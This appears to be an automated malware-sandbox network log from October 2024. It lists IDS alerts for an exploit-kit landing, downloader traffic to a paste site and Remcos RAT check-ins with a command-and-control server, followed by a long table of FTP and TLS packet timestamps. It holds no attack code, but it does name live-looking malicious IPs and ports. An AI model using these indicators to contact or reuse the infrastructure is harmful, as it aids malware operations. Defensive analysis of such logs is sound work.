2024-10-22T06:17:16.611141+0200 | 2020425 | ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 | 1 | 188.114.96.3 | 443 | 192.168.2.4 | 49735 | TCP
2024-10-22T06:17:21.239768+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | TCP
2024-10-22T06:17:21.239768+0200 | 2841075 | ETPRO MALWARE Terse Request to paste .ee - Possible Download | 1 | 192.168.2.4 | 49741 | 188.114.96.3 | 443 | TCP
2024-10-22T06:17:25.805214+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49745 | 43.226.229.232 | 57484 | TCP
2024-10-22T06:17:27.226086+0200 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 43.226.229.232 | 57484 | 192.168.2.4 | 49745 | TCP
2024-10-22T06:17:29.198114+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 49748 | 178.237.33.50 | 80 | TCP
2024-10-22T06:19:42.831194+0200 | 2032777 | ET MALWARE Remcos 3.x Unencrypted Server Response | 1 | 43.226.229.232 | 57484 | 192.168.2.4 | 49745 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 22, 2024 06:17:03.523197889 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:03.528800011 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:03.528875113 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:05.341645956 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:05.342750072 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:05.351474047 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:05.618324995 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:05.618571043 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:05.623976946 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:05.896672010 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:05.896902084 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:05.902633905 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:06.168792009 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:06.169037104 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:06.174609900 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:06.440356016 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:06.440857887 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:06.446630955 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:06.712142944 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:06.712310076 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:06.717658997 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:06.984183073 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:06.987605095 CEST | 49731 | 60113 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:06.993113995 CEST | 60113 | 49731 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:06.993257999 CEST | 49731 | 60113 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:06.993275881 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:06.998902082 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:07.265403032 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:07.314537048 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:07.762388945 CEST | 60113 | 49731 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:07.765045881 CEST | 21 | 49730 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:07.814424038 CEST | 49730 | 21 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:07.814802885 CEST | 49731 | 60113 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:07.906577110 CEST | 60113 | 49731 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:07.906706095 CEST | 49731 | 60113 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:07.907746077 CEST | 49731 | 60113 | 192.168.2.4 | 191.252.83.213
Oct 22, 2024 06:17:07.915416956 CEST | 60113 | 49731 | 191.252.83.213 | 192.168.2.4
Oct 22, 2024 06:17:07.931243896 CEST | 49732 | 443 | 192.168.2.4 | 188.114.96.3
Oct 22, 2024 06:17:07.931276083 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:07.931339979 CEST | 49732 | 443 | 192.168.2.4 | 188.114.96.3
Oct 22, 2024 06:17:07.936860085 CEST | 49732 | 443 | 192.168.2.4 | 188.114.96.3
Oct 22, 2024 06:17:07.936883926 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:08.567951918 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:08.568191051 CEST | 49732 | 443 | 192.168.2.4 | 188.114.96.3
Oct 22, 2024 06:17:08.571227074 CEST | 49732 | 443 | 192.168.2.4 | 188.114.96.3
Oct 22, 2024 06:17:08.571242094 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:08.571671963 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:08.585843086 CEST | 49732 | 443 | 192.168.2.4 | 188.114.96.3
Oct 22, 2024 06:17:08.631346941 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:08.765750885 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:08.766884089 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:08.766943932 CEST | 49732 | 443 | 192.168.2.4 | 188.114.96.3
Oct 22, 2024 06:17:08.766966105 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:08.768157959 CEST | 443 | 49732 | 188.114.96.3 | 192.168.2.4
Oct 22, 2024 06:17:08.768213034 CEST | 49732 | 443 | 192.168.2.4 | 188.114.96.3
                                                                                                Oct 22, 2024 06:17:08.768224955 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.771294117 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.771348000 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:08.771359921 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.801886082 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.801945925 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:08.801963091 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.845663071 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:08.845690966 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.884874105 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.885127068 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:08.885158062 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.886610985 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.886774063 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:08.886804104 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.889027119 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.889094114 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:08.889123917 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.920722008 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.920792103 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:08.920811892 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:08.970645905 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:08.974729061 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.002834082 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.003211975 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.003351927 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.005882025 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.005965948 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.007443905 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.008804083 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:09.008838892 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.009038925 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:09.039294004 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.080116034 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:09.080152035 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.094074965 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.094227076 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:09.094258070 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.121989012 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.122138977 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.122265100 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:09.122297049 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.122353077 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:09.123678923 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.125658989 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.125787973 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:09.125818968 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.126863003 CEST44349732188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:09.126995087 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:09.128865957 CEST49732443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:10.595839977 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:10.910274982 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:11.517538071 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:11.645958900 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:11.645972013 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:11.645979881 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:11.911505938 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:11.912363052 CEST4973360162192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:11.917810917 CEST6016249733191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:11.917910099 CEST4973360162192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:11.917931080 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:11.923401117 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:12.189333916 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:12.236270905 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:12.672655106 CEST6016249733191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:12.674597025 CEST2149730191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:12.720655918 CEST4973021192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:12.720793009 CEST4973360162192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:12.808377028 CEST6016249733191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:12.808533907 CEST4973360162192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:12.808533907 CEST4973360162192.168.2.4191.252.83.213
                                                                                                Oct 22, 2024 06:17:12.809062004 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:12.809144974 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:12.809483051 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:12.809947014 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:12.809988022 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:12.814032078 CEST6016249733191.252.83.213192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.418948889 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.420175076 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.420217991 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.710195065 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.710294962 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.710449934 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.710480928 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.711883068 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.711935043 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.711965084 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.741580009 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.741633892 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.741647005 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.744474888 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.744499922 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.744551897 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.744561911 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.744606018 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.835350990 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.837088108 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.837115049 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.837143898 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.837176085 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.837229967 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.858098984 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.859786034 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.859818935 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.859843016 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.859874964 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.859920979 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.861715078 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.908164978 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.908194065 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.944097996 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.944133997 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.944164991 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.944195986 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.944252968 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.945841074 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.975856066 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.975931883 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.976013899 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.977255106 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:13.977310896 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:13.977329016 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.017577887 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.017740011 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.017800093 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.061217070 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.061378956 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.061439991 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.062175989 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.062330961 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.062392950 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.092823982 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.092859030 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.092931986 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.092994928 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.093060970 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.094491959 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.134094954 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.134165049 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.134215117 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.180176020 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.180191040 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.180351973 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.180414915 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.209850073 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.210025072 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.210088015 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.210302114 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.251208067 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.251228094 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.251386881 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.253319025 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.253334045 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.253391027 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.295600891 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.295618057 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.295674086 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.326862097 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.327040911 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.327101946 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.327169895 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.328633070 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.328644037 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.328687906 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.369673967 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.369693041 CEST44349734188.114.96.3192.168.2.4
                                                                                                Oct 22, 2024 06:17:14.369844913 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.369844913 CEST49734443192.168.2.4188.114.96.3
                                                                                                Oct 22, 2024 06:17:14.412643909 CEST44349734188.114.96.3192.168.2.4
Oct 22, 2024 06:17:14.412661076 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.412818909 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.443793058 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.443809032 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.443991899 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.445717096 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.445728064 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.445781946 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.485687017 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.485873938 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.529746056 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.529926062 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.561048985 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.561218023 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.562655926 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.562720060 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.565274954 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.565335989 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.647416115 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.647593975 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.648786068 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.648854971 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.681144953 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.681333065 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.682233095 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.682291031 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.719579935 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.719654083 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.768261909 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.768455982 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.769996881 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.770070076 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.773828030 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.773900986 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.796271086 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.796355963 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.836730003 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.836910963 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.885509968 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.885694981 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.889369965 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.889444113 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.911359072 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.911446095 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:14.913259983 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:14.913320065 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.000469923 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.001940966 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.006011963 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.006045103 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.006119013 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.006159067 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.008243084 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.008421898 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.008483887 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.008544922 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.028951883 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.029135942 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.070873976 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.070926905 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.071036100 CEST  443  49734  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.071048021 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.071115971 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.071506977 CEST  49734  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.089139938 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.089184999 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.089253902 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.089528084 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.089549065 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.718583107 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.718799114 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.721952915 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.721970081 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.722383022 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:15.723311901 CEST  49735  443  192.168.2.4  188.114.96.3
Oct 22, 2024 06:17:15.763356924 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.125319004 CEST  443  49735  188.114.96.3  192.168.2.4
Oct 22, 2024 06:17:16.125363111 CEST  443  49735  188.114.96.3  192.168.2.4
